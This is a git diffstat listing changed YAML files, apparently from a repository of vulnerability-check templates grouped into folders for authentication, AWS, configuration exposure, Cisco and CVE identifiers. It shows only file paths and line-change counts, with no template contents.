poc/auth/manageengine-keymanagerplus.yaml | 21 +- .../mantisbt-default-credential-8778.yaml | 9 +- .../mantisbt-default-credential-8779.yaml | 41 - poc/auth/meshcentral-login-8801.yaml | 21 - poc/auth/meshcentral-login-8803.yaml | 21 + poc/auth/metersphere-login.yaml | 24 +- ...micro-focus-ucmdb-default-credentials.yaml | 2 - poc/auth/minio-default-login-8888.yaml | 35 - poc/auth/minio-default-login-8889.yaml | 9 - poc/auth/minio-default-password.yaml | 6 - poc/auth/mobileiron-login.yaml | 20 +- poc/auth/mongodb-unauth-8928.yaml | 4 +- poc/auth/mongodb-unauth.yaml | 26 - poc/auth/movable-type-login.yaml | 21 +- poc/auth/nagios-default-login-8991.yaml | 39 - poc/auth/nagios-default-login.yaml | 31 + poc/auth/netgear-router-auth-bypass-9026.yaml | 8 +- poc/auth/netgear-router-auth-bypass-9027.yaml | 16 +- poc/auth/netsus-server-login-9061.yaml | 20 + poc/auth/netsus-server-login-9062.yaml | 20 - poc/auth/nps-default-login-9144.yaml | 13 +- poc/auth/nps-default-login-9145.yaml | 19 +- poc/auth/nps-default-password.yaml | 19 +- poc/auth/nuuno-network-login-9161.yaml | 3 +- poc/auth/nuuno-network-login-9164.yaml | 34 + poc/auth/oauth-access-key-9184.yaml | 11 +- poc/auth/oauth-access-key-9186.yaml | 15 + poc/auth/oauth2-detect-9181.yaml | 28 + poc/auth/oauth2-detect-9182.yaml | 51 +- poc/auth/oauth2-detect-9183.yaml | 8 +- poc/auth/octobercms-default-login-9192.yaml | 59 + ...193.yaml => octobercms-default-login.yaml} | 0 poc/auth/open-stack-dashboard-login-9322.yaml | 22 + poc/auth/open-stack-dashboard-login-9324.yaml | 24 - poc/auth/openbmcs-secret-disclosure-9260.yaml | 36 + poc/auth/openbmcs-secret-disclosure.yaml | 24 - poc/auth/oracle-ebs-credentials-9365.yaml | 28 - poc/auth/oracle-ebs-credentials-9366.yaml | 28 + poc/auth/oracle-ebs-credentials.yaml | 2 +- poc/auth/panabit-default-login-9438.yaml | 44 + ...n-9440.yaml => panabit-default-login.yaml} | 0 .../panabit-ixcache-default-login-9443.yaml | 14 +- poc/auth/panabit-ixcache-default-login.yaml | 30 - poc/auth/pentaho-default-login-9478.yaml | 10 + poc/auth/pentaho-default-login.yaml | 43 - poc/auth/pictatic-api-key.yaml | 5 +- poc/auth/pieregister-open-redirect-9579.yaml | 28 + poc/auth/pieregister-open-redirect.yaml | 23 - .../pieregister-plugin-open-redirect.yaml | 10 +- poc/auth/pinpoint-unauth-9588.yaml | 16 +- poc/auth/pinpoint-unauth-9590.yaml | 27 - poc/auth/plastic-scm-login-9591.yaml | 3 +- poc/auth/plastic-scm-login.yaml | 20 +- poc/auth/polycom-login.yaml | 22 +- poc/auth/private-key-9655.yaml | 21 + poc/auth/private-key-9656.yaml | 21 - poc/auth/private-key.yaml | 22 +- poc/auth/project-insight-login.yaml | 23 +- poc/auth/pure-storage-login.yaml | 18 +- .../putty-private-key-disclosure-9731.yaml | 22 + .../putty-private-key-disclosure-9732.yaml | 26 - poc/auth/putty-private-key-disclosure.yaml | 28 +- poc/auth/r-webserver-login.yaml | 22 +- poc/auth/rabbitmq-default-login-9786.yaml | 32 - poc/auth/rabbitmq-default-login.yaml | 36 - ...> rails-secret-token-disclosure-9810.yaml} | 0 poc/auth/rainloop-default-login-9813.yaml | 49 - poc/auth/rainloop-default-login.yaml | 11 +- poc/auth/rancher-default-login-9814.yaml | 11 +- ...n-9815.yaml => rancher-default-login.yaml} | 0 poc/auth/ranger-default-login-9827.yaml | 48 - ...in-9828.yaml => ranger-default-login.yaml} | 0 poc/auth/remote-ui-login-9859.yaml | 19 - poc/auth/remote-ui-login-9861.yaml | 20 + poc/auth/remote-ui-login.yaml | 19 +- poc/auth/ricoh-weak-password-9880.yaml | 42 + ...ord-9882.yaml => ricoh-weak-password.yaml} | 0 poc/auth/robomongo-credential.yaml | 22 +- poc/auth/rockmongo-default-credentials.yaml | 5 + poc/auth/rockmongo-default-login-9899.yaml | 15 +- poc/auth/rockmongo-default-login.yaml | 41 - poc/auth/routeros-login.yaml | 20 + poc/auth/rseenet-default-login-9913.yaml | 44 + poc/auth/rseenet-default-login-9914.yaml | 6 +- poc/auth/ruijie-eg-password-leak.yaml | 8 +- poc/auth/saferoads-vms-login-9970.yaml | 15 - poc/auth/saferoads-vms-login-9973.yaml | 16 + poc/auth/saferoads-vms-login-9974.yaml | 5 +- .../samsung-wlan-default-login-10015.yaml | 9 +- .../samsung-wlan-default-login-10017.yaml | 3 +- poc/auth/sangfor-edr-auth-bypass-10022.yaml | 33 +- poc/auth/sangfor-edr-auth-bypass.yaml | 29 + poc/auth/sauter-login-10089.yaml | 2 +- poc/auth/seats-login-10104.yaml | 19 - poc/auth/seats-login-10107.yaml | 18 + poc/auth/seats-login-10108.yaml | 3 - poc/auth/secnet-ac-default-login-10113.yaml | 12 +- poc/auth/secnet-ac-default-login.yaml | 36 + poc/auth/seeddms-default-login-10127.yaml | 20 +- poc/auth/seeddms-default-login-10128.yaml | 23 +- ...10140.yaml => sendgrid-api-key-10142.yaml} | 0 poc/auth/sendgrid-api-key.yaml | 15 + poc/auth/sequoiadb-default-login-10150.yaml | 9 +- poc/auth/sequoiadb-default-login-10151.yaml | 37 - poc/auth/sequoiadb-default-login-10152.yaml | 45 + poc/auth/server-backup-login-10153.yaml | 19 - poc/auth/server-backup-login-10154.yaml | 7 +- poc/auth/server-backup-login-10156.yaml | 20 + poc/auth/service-pwd-10176.yaml | 13 +- poc/auth/service-pwd-10178.yaml | 22 - poc/auth/service-pwd-10179.yaml | 6 +- poc/auth/servicedesk-login-panel-10171.yaml | 20 + poc/auth/servicedesk-login-panel-10173.yaml | 19 - .../servicenow-helpdesk-credential-10175.yaml | 10 +- poc/auth/servicenow-helpdesk-credential.yaml | 27 + poc/auth/sgp-login-panel-10184.yaml | 31 - poc/auth/sgp-login-panel-10186.yaml | 30 + poc/auth/sharecenter-login-10187.yaml | 17 + poc/auth/sharecenter-login-10189.yaml | 18 - poc/auth/sharecenter-login-10190.yaml | 1 - poc/auth/shopify-custom-token(1).yaml | 16 + ...8.yaml => shopify-custom-token-11860.yaml} | 0 poc/auth/shopify-custom-token.yaml | 5 +- poc/auth/shopify-private-token-10199.yaml | 13 - poc/auth/shopify-shared-secret-11862.yaml | 16 + poc/auth/shopify-shared-secret.yaml | 5 +- poc/auth/shoppable-token-10206.yaml | 3 +- ...-10209.yaml => shoppable-token-10208.yaml} | 0 poc/auth/showdoc-default-login-10221.yaml | 3 +- poc/auth/showdoc-default-login-10222.yaml | 16 +- poc/auth/sitecore-login.yaml | 16 +- poc/auth/sitefinity-login-10297.yaml | 9 +- poc/auth/sitefinity-login-10299.yaml | 3 + poc/auth/siteomat-login-10301.yaml | 19 - poc/auth/siteomat-login-10303.yaml | 20 + poc/auth/siteomat-login.yaml | 3 +- ...-10312.yaml => slack-bot-token-10313.yaml} | 0 poc/auth/slocum-login.yaml | 17 +- poc/auth/smartsense-default-login-10330.yaml | 6 +- poc/auth/smartsense-default-login-10331.yaml | 21 +- poc/auth/solarwinds-default-login-10354.yaml | 43 +- poc/auth/solarwinds-default-login-10355.yaml | 3 +- ...-10376.yaml => sonarqube-login-10374.yaml} | 0 poc/auth/sonarqube-token.yaml | 15 - poc/auth/spark-webui-unauth-10401.yaml | 6 +- poc/auth/spark-webui-unauth.yaml | 15 +- poc/auth/spectracom-default-login-10403.yaml | 9 +- poc/auth/spectracom-default-login-10405.yaml | 3 +- poc/auth/sphider-login-10410.yaml | 4 + poc/auth/sphider-login.yaml | 24 +- poc/auth/splunk-enterprise-login-panel.yaml | 35 +- poc/auth/splunk-enterprise-login-panel.yml | 22 - poc/auth/splunk-login-10416.yaml | 19 + poc/auth/splunk-login-10418.yaml | 4 +- poc/auth/square-access-token.yaml | 4 - poc/auth/square-oauth-secret.yaml | 4 - poc/auth/squirrelmail-login-10519.yaml | 5 +- poc/auth/squirrelmail-login-10521.yaml | 27 + poc/auth/ssh-authorized-keys-10523.yaml | 22 +- poc/auth/ssrf-via-oauth-misconfig-10526.yaml | 31 - poc/auth/ssrf-via-oauth-misconfig-10527.yaml | 14 +- poc/auth/stackstorm-default-login-10530.yaml | 41 + poc/auth/stackstorm-default-login.yaml | 4 +- poc/auth/stem-audio-table-private-keys.yaml | 9 +- poc/auth/stripe-api-key(1).yaml | 16 - poc/auth/stripe-api-key-11869.yaml | 13 + poc/auth/stripe-api-key.yaml | 3 +- poc/auth/stripe-restricted-key-10553.yaml | 22 - poc/auth/stripe-restricted-key.yaml | 15 + poc/auth/stripe-secret-key-10556.yaml | 11 +- ...-key.yaml => stripe-secret-key-10558.yaml} | 0 poc/auth/submitty-login-10567.yaml | 31 + poc/auth/submitty-login-10568.yaml | 31 - poc/auth/supermicro-default-login-10572.yaml | 11 +- poc/auth/supermicro-default-login.yaml | 36 - poc/auth/superset-default-login-10574.yaml | 60 +- poc/auth/superset-default-login.yaml | 8 + poc/auth/symantec-dlp-login-10598.yaml | 7 +- poc/auth/symantec-epm-login-10599.yaml | 20 - poc/auth/symantec-epm-login-10602.yaml | 3 +- ...03.yaml => symantec-ewep-login-10606.yaml} | 0 poc/auth/symantec-ewep-login.yaml | 16 +- poc/auth/szhe-default-login-10638.yaml | 49 - poc/auth/szhe-default-login.yaml | 41 + .../telecom-gateway-default-login-10686.yaml | 14 +- poc/auth/telecom-gateway-default-login.yaml | 33 + poc/auth/tidb-unauth-10771.yaml | 14 +- poc/auth/tidb-unauth-10772.yaml | 28 - poc/auth/tomcat-default-login-10789.yaml | 103 +- poc/auth/tomcat-default-login-10790.yaml | 2 +- poc/auth/trilithic-viewpoint-login.yaml | 40 - poc/auth/twitter-secret(1).yaml | 16 - poc/auth/twitter-secret-10862.yaml | 13 + poc/auth/twitter-secret.yaml | 7 +- poc/auth/ucmdb-default-login-10871.yaml | 35 + poc/auth/ucmdb-default-login.yaml | 41 - poc/auth/unauth-ftp-10940.yaml | 9 +- poc/auth/unauth-ftp-10941.yaml | 2 +- poc/auth/unauth-message-read-10945.yaml | 3 +- ...ad-10947.yaml => unauth-message-read.yaml} | 0 poc/auth/unauth-rlm-10960.yaml | 14 +- poc/auth/unauth-spark-api-10964.yaml | 8 + poc/auth/unauth-spark-api-10965.yaml | 12 +- poc/auth/unauth-wavink-panel-10966.yaml | 12 +- poc/auth/unauth-wavink-panel-10967.yaml | 15 +- poc/auth/unauth-xproxy-dashboard-10968.yaml | 23 - poc/auth/unauth-xproxy-dashboard-10969.yaml | 27 + poc/auth/unauth-xproxy-dashboard.yaml | 16 +- poc/auth/unauthenticated-airflow-10884.yaml | 27 + poc/auth/unauthenticated-airflow-10886.yaml | 2 +- poc/auth/unauthenticated-alert-manager.yaml | 19 - poc/auth/unauthenticated-frp-10895.yaml | 21 + poc/auth/unauthenticated-frp-10896.yaml | 21 - poc/auth/unauthenticated-frp-10897.yaml | 9 +- poc/auth/unauthenticated-glowroot-10900.yaml | 36 + poc/auth/unauthenticated-glowroot-10902.yaml | 5 + .../unauthenticated-jenkin-dashboard.yaml | 3 +- .../unauthenticated-mongo-express-10909.yaml | 8 +- .../unauthenticated-mongo-express-10911.yaml | 26 + .../unauthenticated-nacos-access-10912.yaml | 40 + poc/auth/unauthenticated-netdata-10916.yaml | 25 - poc/auth/unauthenticated-netdata-10918.yaml | 26 + .../unauthenticated-popup-upload-10922.yaml | 20 + .../unauthenticated-popup-upload-10923.yaml | 24 - poc/auth/unauthenticated-prtg-10924.yaml | 20 - poc/auth/unauthenticated-prtg-10926.yaml | 9 +- poc/auth/unauthenticated-prtg-10928.yaml | 2 +- ...thenticated-varnish-cache-purge-10931.yaml | 12 +- ...thenticated-varnish-cache-purge-10933.yaml | 8 +- ...yaml => unauthenticated-zipkin-10935.yaml} | 0 poc/auth/unauthenticated-zipkin.yaml | 30 + .../unauthorized-h3csecparh-login-10949.yaml | 34 - poc/auth/unauthorized-h3csecparh-login.yaml | 26 + ...aml => unauthorized-hp-printer-10951.yaml} | 0 poc/auth/unauthorized-hp-printer-10953.yaml | 24 - poc/auth/unauthorized-hp-printer.yaml | 8 +- poc/auth/unauthorized-plastic-scm-10955.yaml | 42 + poc/auth/unauthorized-plastic-scm-10957.yaml | 49 - poc/auth/unauthorized-plastic-scm.yaml | 7 + ...zed-puppet-node-manager-detect-10959.yaml} | 0 ...authorized-puppet-node-manager-detect.yaml | 9 +- poc/auth/versa-default-login-11004.yaml | 29 +- poc/auth/versa-default-login.yaml | 49 - poc/auth/vidyo-default-login-11010.yaml | 11 +- poc/auth/vigor-login-11021.yaml | 19 - poc/auth/vigor-login-11023.yaml | 20 + poc/auth/vigor-login.yaml | 22 +- poc/auth/visionhub-default-login-11026.yaml | 42 + ...1029.yaml => visionhub-default-login.yaml} | 0 poc/auth/vpms-auth-bypass-11066.yaml | 33 - poc/auth/vpms-auth-bypass-11068.yaml | 3 +- poc/auth/vpms-auth-bypass.yaml | 29 +- .../watchguard-credentials-disclosure.yaml | 33 - poc/auth/weblogic-weak-login-11156.yaml | 14 +- poc/auth/weblogic-weak-login.yaml | 61 - poc/auth/whm-login-detect.yaml | 22 +- poc/auth/wifisky-default-login-11201.yaml | 55 + poc/auth/wifisky-default-login.yaml | 48 + ...ordpress-infinitewp-auth-bypass-11285.yaml | 19 +- ...ordpress-infinitewp-auth-bypass-11286.yaml | 13 +- .../wordpress-updraftplus-pem-key-11325.yaml | 4 + .../wordpress-weak-credentials-11334.yaml | 26 +- .../wordpress-weak-credentials-11335.yaml | 50 + poc/auth/wpdm-cache-session-11438.yaml | 6 +- poc/auth/wpdm-cache-session.yaml | 14 +- poc/auth/wpmudev-pub-keys-11504.yaml | 3 + poc/auth/wso2-default-login-11640.yaml | 10 +- ...gin-11641.yaml => wso2-default-login.yaml} | 0 poc/auth/xenforo-login-11673.yaml | 17 + poc/auth/xenforo-login-11674.yaml | 17 + poc/auth/xenmobile-login-11675.yaml | 19 + poc/auth/xenmobile-login-11677.yaml | 20 - poc/auth/xvr-login-11704.yaml | 24 + poc/auth/xvr-login-11706.yaml | 23 - poc/auth/xxljob-default-login-11709.yaml | 11 +- poc/auth/xxljob-default-login-11713.yaml | 22 +- ...2.yaml => zabbix-default-login-11763.yaml} | 0 poc/auth/zabbix-server-login-11767.yaml | 19 - poc/auth/zabbix-server-login-11769.yaml | 7 +- poc/auth/zabbix-server-login-11770.yaml | 20 + poc/auth/zhiyuan-oa-session-leak-11801.yaml | 3 +- poc/auth/zhiyuan-oa-session-leak-11802.yaml | 22 + poc/auth/zhiyuan-oa-session-leak-11805.yaml | 9 +- poc/auth/zimbra-preauth-ssrf-11810.yaml | 16 +- ...rf.yaml => zimbra-preauth-ssrf-11811.yaml} | 0 poc/auth/zmanda-default-login-11826.yaml | 39 + poc/auth/zmanda-default-login.yaml | 31 - ...-11830.yaml => zms-auth-bypass-11832.yaml} | 0 poc/auth/zms-auth-bypass.yaml | 26 +- poc/aws/amazon-docker-config-280.yaml | 28 - .../amazon-docker-config-disclosure-278.yaml | 18 - poc/aws/amazon-docker-config-disclosure.yaml | 12 +- poc/aws/amazon-docker-config.yaml | 18 + poc/aws/amazon-mws-auth-token-11845.yaml | 23 - poc/aws/amazon-mws-auth-token-283.yaml | 11 +- poc/aws/amazon-mws-auth-token.yaml | 16 + ...ess-id-620.yaml => aws-access-id-618.yaml} | 0 poc/aws/aws-access-id.yaml | 39 +- poc/aws/aws-bucket-takeover-630.yaml | 24 + poc/aws/aws-bucket-takeover-632.yaml | 20 - poc/aws/aws-bucket-takeover.yaml | 8 +- poc/aws/aws-cognito.yaml | 71 +- .../aws-ecs-container-agent-tasks-640.yaml | 25 + poc/aws/aws-elastic-beanstalk-detect.yaml | 3 +- ...g-648.yaml => aws-object-listing-645.yaml} | 0 poc/aws/aws-object-listing.yaml | 16 +- poc/aws/aws-opensearch-login-649.yaml | 24 + poc/aws/aws-opensearch-login-650.yaml | 25 - poc/aws/awstats-config-655.yaml | 18 +- poc/aws/awstats-config-656.yaml | 26 + poc/aws/ec2-detection-7161.yaml | 15 +- poc/aws/ec2-detection-7162.yaml | 18 - poc/aws/metadata-aws-8810.yaml | 41 + poc/aws/metadata-aws.yaml | 10 +- poc/aws/s3-bucket.yaml | 4 - poc/aws/s3-detect-9963.yaml | 2 + poc/aws/s3-detect-9965.yaml | 17 - poc/aws/s3-subtakeover-9967.yaml | 20 + poc/backup/adb-backup-enabled-62.yaml | 15 + poc/backup/adb-backup-enabled-63.yaml | 16 - poc/backup/adb-backup-enabled.yaml | 13 +- poc/backup/db-backup-lfi-6774.yaml | 7 +- poc/backup/db-backup-lfi-6776.yaml | 11 +- ...s-9497.yaml => php-backup-files-9498.yaml} | 0 poc/backup/php-backup-files.yaml | 127 +- poc/backup/server-backup-login-10153.yaml | 19 - poc/backup/server-backup-login-10154.yaml | 7 +- poc/backup/server-backup-login-10156.yaml | 20 + .../server-backup-manager-se-10157.yaml | 19 - .../server-backup-manager-se-10160.yaml | 20 + poc/backup/server-backup-manager-se.yaml | 25 +- .../wordpress-db-backup-listing-11250.yaml | 6 +- ...ordpress-total-upkeep-backup-download.yaml | 13 +- poc/backup/zip-backup-files-11815.yaml | 57 - poc/backup/zip-backup-files-11818.yaml | 99 +- poc/cisco/cisco-asa-panel-932.yaml | 31 + .../cisco-cloudcenter-suite-log4j-rce.yaml | 63 + poc/cisco/cisco-cloudcenter-suite-rce.yaml | 73 - ...-938.yaml => cisco-finesse-login-940.yaml} | 0 poc/cisco/cisco-finesse-login.yaml | 16 +- ...3.yaml => cisco-integrated-login-941.yaml} | 0 poc/cisco/cisco-meraki-exposure-944.yaml | 25 + poc/cisco/cisco-meraki-exposure-946.yaml | 26 - poc/cisco/cisco-network-config-948.yaml | 34 + poc/cisco/cisco-network-config-949.yaml | 5 +- poc/cisco/cisco-sd-wan.yaml | 19 +- poc/cisco/cisco-secure-cn.yaml | 16 +- poc/cisco/cisco-secure-desktop-962.yaml | 27 - poc/cisco/cisco-secure-desktop.yaml | 61 +- poc/cisco/cisco-sendgrid-968.yaml | 3 +- poc/cisco/cisco-sendgrid-969.yaml | 30 + poc/cisco/cisco-smi-exposure-971.yaml | 33 + poc/cisco/cisco-smi-exposure-972.yaml | 11 +- poc/cisco/cisco-systems-login-975.yaml | 15 +- poc/cisco/cisco-systems-login.yaml | 27 +- poc/cisco/cisco-telepresence-976.yaml | 25 + poc/cisco/cisco-telepresence-978.yaml | 25 - poc/cisco/cisco-telepresence.yaml | 18 +- poc/cisco/cisco-ucs-kvm-login-979.yaml | 27 + poc/cisco/cisco-ucs-kvm-login-980.yaml | 28 - .../adobe-coldfusion-detect-82.yaml | 68 - poc/coldfusion/adobe-coldfusion-detect.yaml | 62 + .../adobe-coldfusion-error-detect-86.yaml | 7 +- ... => adobe-coldfusion-error-detect-88.yaml} | 0 .../coldfusion-administrator-login-1145.yaml | 26 - .../coldfusion-administrator-login.yaml | 18 +- poc/coldfusion/coldfusion-debug-xss-1152.yaml | 61 +- ...ss.yaml => coldfusion-debug-xss-1153.yaml} | 0 poc/coldfusion/unpatched-coldfusion.yaml | 5 - poc/config/aerohive-netconfig-ui-199.yaml | 14 +- poc/config/aerohive-netconfig-ui.yaml | 31 - .../airflow-configuration-exposure-230.yaml | 28 - .../airflow-configuration-exposure.yaml | 16 + poc/config/amazon-docker-config-280.yaml | 28 - .../amazon-docker-config-disclosure-278.yaml | 18 - .../amazon-docker-config-disclosure.yaml | 12 +- poc/config/amazon-docker-config.yaml | 18 + poc/config/ansible-config-disclosure-326.yaml | 28 + poc/config/ansible-config-disclosure.yaml | 16 - poc/config/api-iconfinder-439.yaml | 34 - poc/config/api-iconfinder.yaml | 28 + poc/config/awstats-config-655.yaml | 18 +- poc/config/awstats-config-656.yaml | 26 + .../bigip-config-utility-detect-730.yaml | 12 +- .../bigip-config-utility-detect-731.yaml | 34 + .../bigip-config-utility-detect-733.yaml | 34 + poc/config/buffalo-config-injection-798.yaml | 30 - ...yaml => buffalo-config-injection-801.yaml} | 0 poc/config/circleci-config-924.yaml | 25 - poc/config/circleci-ssh-config-928.yaml | 17 +- poc/config/cisco-network-config-948.yaml | 34 + poc/config/cisco-network-config-949.yaml | 5 +- poc/config/config-rb-1179.yaml | 30 - poc/config/config-rb-1180.yaml | 11 +- poc/config/configuration-listing-1181.yaml | 23 +- poc/config/configuration-listing-1182.yaml | 35 + .../confluence-ssrf-sharelinks-1191.yaml | 31 +- .../confluence-ssrf-sharelinks-1192.yaml | 44 + .../confluence-ssrf-sharelinks-1193.yaml | 36 - .../coremail-config-disclosure-1215.yaml | 28 - .../coremail-config-disclosure-1216.yaml | 23 + poc/config/coremail-config-disclosure.yaml | 16 +- poc/config/cors-misconfig-1222.yaml | 103 +- poc/config/detect-drone-config-6972.yaml | 11 +- poc/config/discuz-config-global.yaml | 12 +- poc/config/docker-compose-config-7058.yaml | 7 +- poc/config/docker-compose-config-7059.yaml | 26 + poc/config/docker-compose-config-7060.yaml | 4 - poc/config/dockercfg-config-7056.yaml | 35 + poc/config/dockercfg-config.yaml | 32 - poc/config/esmtprc-config-7259.yaml | 8 +- poc/config/esmtprc-config-7260.yaml | 31 + poc/config/extreme-netconfig-ui-7371.yaml | 1 - poc/config/firebase-config-exposure-7487.yaml | 30 + ...485.yaml => firebase-config-exposure.yaml} | 0 poc/config/front-page-misconfig-7545.yaml | 10 +- poc/config/ftpconfig-7565.yaml | 32 - poc/config/ftpconfig.yaml | 27 + poc/config/git-config-7633.yaml | 26 - poc/config/git-config-7638.yaml | 31 + .../git-config-nginxoffbyslash-7628.yaml | 38 + .../git-config-nginxoffbyslash-7632.yaml | 21 +- poc/config/github-page-config-7655.yaml | 4 +- poc/config/github-page-config.yaml | 26 - .../gocd-cruise-configuration-7746.yaml | 31 - .../gocd-cruise-configuration-7748.yaml | 31 + .../grandstream-device-configuration.yaml | 9 +- poc/config/honeywell-scada-config-7990.yaml | 31 + poc/config/honeywell-scada-config.yaml | 26 - poc/config/htaccess-config-8042.yaml | 6 +- poc/config/htaccess-config-8044.yaml | 30 - poc/config/joomla-config-dist-file.yaml | 56 +- poc/config/joomla-config-file-8376.yaml | 31 + ...file-8375.yaml => joomla-config-file.yaml} | 0 ....yaml => keycloak-openid-config-8475.yaml} | 0 poc/config/keycloak-openid-config.yaml | 26 + poc/config/magento-config-8702.yaml | 26 + poc/config/magento-config-8703.yaml | 9 +- poc/config/magento-config-disclosure.yaml | 50 - poc/config/misconfigured-docker-8902.yaml | 8 +- poc/config/msmtp-config-8966.yaml | 12 +- poc/config/msmtp-config-8967.yaml | 16 +- ...inx-config.yaml => nginx-config-9097.yaml} | 0 poc/config/nginx-config-9098.yaml | 21 - poc/config/nginx-config-9099.yaml | 10 +- poc/config/owncloud-config-9420.yaml | 36 + poc/config/owncloud-config.yaml | 21 - poc/config/php-fpm-config-9514.yaml | 34 + poc/config/php-fpm-config.yaml | 20 - poc/config/proftpd-config-9667.yaml | 34 + poc/config/proftpd-config.yaml | 20 - poc/config/prometheus-config-9673.yaml | 37 + poc/config/prometheus-config-endpoint.yaml | 19 +- poc/config/prometheus-config.yaml | 27 - poc/config/rails-database-config-9802.yaml | 22 - poc/config/rails-database-config-9803.yaml | 20 +- poc/config/rconfig-rce-9834.yaml | 61 - poc/config/samba-config.yaml | 20 - poc/config/springboot-autoconfig-10437.yaml | 1 + poc/config/springboot-autoconfig.yaml | 25 - poc/config/springboot-configprops-10443.yaml | 32 - poc/config/springboot-configprops-10444.yaml | 33 + poc/config/springboot-configprops-10445.yaml | 5 +- .../ssrf-via-oauth-misconfig-10526.yaml | 31 - .../ssrf-via-oauth-misconfig-10527.yaml | 14 +- poc/config/svnserve-config-10590.yaml | 34 - poc/config/svnserve-config.yaml | 18 + poc/config/symfony-database-config-10617.yaml | 17 +- ...0616.yaml => symfony-database-config.yaml} | 0 ...config-10665.yaml => tcpconfig-10663.yaml} | 0 poc/config/tcpconfig.yaml | 20 + poc/config/tugboat-config-exposure-10843.yaml | 19 +- poc/config/tugboat-config-exposure-10844.yaml | 37 + .../wamp-server-configuration-11098.yaml | 28 - ...99.yaml => wamp-server-configuration.yaml} | 0 poc/config/web-config-11124.yaml | 22 +- .../wordpress-accessible-wpconfig-11234.yaml | 22 + poc/config/wordpress-git-config-11279.yaml | 3 +- poc/config/wp-config-setup-11427.yaml | 19 - poc/config/wp-config-setup-11428.yaml | 19 + poc/config/wp-config-setup-11430.yaml | 5 +- poc/config/zend-config-file-11778.yaml | 17 +- poc/crlf_injection/crlf-injection-1260.yaml | 27 - poc/crlf_injection/crlf-injection-1262.yaml | 29 + .../viewlinc-crlf-injection-11014.yaml | 31 - .../viewlinc-crlf-injection-11015.yaml | 6 +- .../django-debug-exposure-csrf.yaml | 17 +- poc/cve/CNNVD-200705-315.yaml | 2 + poc/cve/CNVD-2019-32204.yaml | 11 +- poc/cve/CNVD-2020-56167.yaml | 20 +- poc/cve/CNVD-2020-62422.yaml | 11 +- poc/cve/CNVD-2021-09650.yaml | 17 +- poc/cve/CNVD-2021-10543.yaml | 18 +- poc/cve/CNVD-2021-14536.yaml | 10 +- poc/cve/CNVD-2021-15824.yaml | 10 +- ...1-28277-1107.yaml => CNVD-2021-28277.yaml} | 0 poc/cve/CNVD-2021-30167.yaml | 23 +- poc/cve/CNVD-2021-49104.yaml | 13 +- poc/cve/CVE-2001-1473.yaml | 26 - poc/cve/CVE-2002-1131.yaml | 35 +- poc/cve/CVE-2004-0519.yaml | 26 +- poc/cve/CVE-2006-2842.yaml | 23 +- poc/cve/CVE-2007-4504.yaml | 26 +- poc/cve/CVE-2008-6080.yaml | 29 +- poc/cve/CVE-2008-6172.yaml | 10 +- poc/cve/CVE-2009-0932.yaml | 32 +- poc/cve/CVE-2009-1496.yaml | 29 +- poc/cve/CVE-2009-2100.yaml | 12 +- poc/cve/CVE-2009-3053.yaml | 28 +- poc/cve/CVE-2010-0219.yaml | 23 +- poc/cve/CVE-2010-0696.yaml | 18 +- poc/cve/CVE-2010-0942.yaml | 27 +- poc/cve/CVE-2010-0943.yaml | 28 +- poc/cve/CVE-2010-0972.yaml | 24 +- poc/cve/CVE-2010-1219.yaml | 27 +- poc/cve/CVE-2010-1307.yaml | 28 +- poc/cve/CVE-2010-1308.yaml | 24 +- poc/cve/CVE-2010-1312.yaml | 25 +- poc/cve/CVE-2010-1345.yaml | 24 +- poc/cve/CVE-2010-1352.yaml | 8 +- poc/cve/CVE-2010-1353.yaml | 4 +- poc/cve/CVE-2010-1469.yaml | 17 +- poc/cve/CVE-2010-1470.yaml | 24 +- poc/cve/CVE-2010-1474.yaml | 28 +- poc/cve/CVE-2010-1475.yaml | 28 +- poc/cve/CVE-2010-1491.yaml | 26 +- poc/cve/CVE-2010-1494.yaml | 26 +- poc/cve/CVE-2010-1532.yaml | 25 +- poc/cve/CVE-2010-1601.yaml | 2 - poc/cve/CVE-2010-1607.yaml | 28 +- poc/cve/CVE-2010-1653.yaml | 27 +- poc/cve/CVE-2010-1657.yaml | 30 +- poc/cve/CVE-2010-1659.yaml | 26 +- poc/cve/CVE-2010-1714.yaml | 28 +- poc/cve/CVE-2010-1715.yaml | 27 +- poc/cve/CVE-2010-1875.yaml | 29 +- poc/cve/CVE-2010-1878.yaml | 25 +- poc/cve/CVE-2010-1954.yaml | 26 +- poc/cve/CVE-2010-1955.yaml | 25 +- poc/cve/CVE-2010-1982.yaml | 26 +- poc/cve/CVE-2010-2122.yaml | 31 +- poc/cve/CVE-2010-2680.yaml | 26 +- poc/cve/CVE-2010-2920.yaml | 25 +- poc/cve/CVE-2010-4977.yaml | 25 +- poc/cve/CVE-2010-5028.yaml | 27 +- poc/cve/CVE-2011-0049.yaml | 24 +- poc/cve/CVE-2011-3315.yaml | 28 +- poc/cve/CVE-2012-0896.yaml | 27 +- poc/cve/CVE-2012-0981.yaml | 26 +- poc/cve/CVE-2012-0991.yaml | 26 +- poc/cve/CVE-2012-4547.yaml | 23 +- poc/cve/CVE-2013-2251.yaml | 40 +- poc/cve/CVE-2013-4117.yaml | 31 +- poc/cve/CVE-2013-5979.yaml | 5 - poc/cve/CVE-2013-7091.yaml | 22 +- poc/cve/CVE-2013-7240.yaml | 4 - poc/cve/CVE-2014-1203.yaml | 22 +- poc/cve/CVE-2014-3120.yaml | 27 +- poc/cve/CVE-2014-4513.yaml | 21 +- poc/cve/CVE-2014-4536.yaml | 28 +- poc/cve/CVE-2014-4539.yaml | 28 +- poc/cve/CVE-2014-4558.yaml | 28 +- poc/cve/CVE-2014-4592.yaml | 47 +- poc/cve/CVE-2014-4942.yaml | 32 +- poc/cve/CVE-2014-5368.yaml | 28 +- poc/cve/CVE-2015-1000012.yaml | 20 +- poc/cve/CVE-2015-1880.yaml | 43 +- poc/cve/CVE-2015-2067.yaml | 13 +- poc/cve/CVE-2015-2080.yaml | 33 +- poc/cve/CVE-2015-3224.yaml | 33 +- poc/cve/CVE-2015-4050.yaml | 4 +- poc/cve/CVE-2015-5531.yaml | 34 +- poc/cve/CVE-2015-6544.yaml | 36 +- poc/cve/CVE-2015-8813.yaml | 25 +- poc/cve/CVE-2016-1000127.yaml | 28 +- poc/cve/CVE-2016-1000131.yaml | 28 +- poc/cve/CVE-2016-1000138.yaml | 28 +- poc/cve/CVE-2016-1000154.yaml | 27 +- poc/cve/CVE-2016-10367.yaml | 25 +- poc/cve/CVE-2016-10940.yaml | 23 +- poc/cve/CVE-2016-10993.yaml | 24 +- poc/cve/CVE-2016-2004.yaml | 31 +- poc/cve/CVE-2017-1000027.yaml | 4 - poc/cve/CVE-2017-1000029.yaml | 27 +- poc/cve/CVE-2017-1000486.yaml | 17 +- 